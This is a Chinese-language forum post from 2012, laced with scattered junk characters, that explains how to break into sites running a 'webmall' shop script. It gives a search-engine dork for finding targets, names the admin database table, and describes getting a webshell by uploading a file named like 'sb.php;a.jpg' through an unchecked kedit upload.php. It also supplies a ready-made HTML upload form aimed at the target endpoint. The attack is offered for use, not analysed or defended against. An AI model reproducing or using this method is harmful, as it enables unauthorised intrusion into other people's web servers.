关键字:inurl:webmall/detail.php?id
' [8 Z" \) i( ?, S4 K# L9 |" W- h) U5 Q- k" s& O, @, l) t
数据表:pwn_base_admin8 _9 Q! d( m. D# L
; C2 b$ P# e* [8 N关于拿shell
) z/ t3 A. Z9 l. x
: t/ H7 w2 D5 g! @6 t首先登录后台admin.php, U8 E! d6 x( d
& g, z4 {# E9 h& m8 B看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
5 X W8 t$ y M换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg& \$ `1 V+ W$ V( G. S7 l# l; a
然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
$ x1 s" F! k# Z$ S3 o2 j<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
: B- V5 P$ u: W% a- E' k! ]% P( q<input type="text" name="fileName" value="sb.php;a.jpg" /> 8 C$ P, y/ N% n& ]
<input type="hidden" name="attachPath" value="news/pics/" /> 7 D( v: H6 z$ m3 ^/ _8 u/ |8 @
<input type="file" name="fileData" size="14" /></td>
3 P; m/ C: `8 d<input type="submit" name="button" value="确定" /> % Q4 E. v4 Z1 L+ P) s
</form>- z3 e+ N9 D+ c3 E8 C; }
; H. G- [8 F$ O; Z' {8 ^$ x首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。( C9 s% c/ X$ r, M
* s6 s4 P1 k( \/ L& u& z4 n
|
发表于 2012-11-9 20:52:15
收藏
支持
反对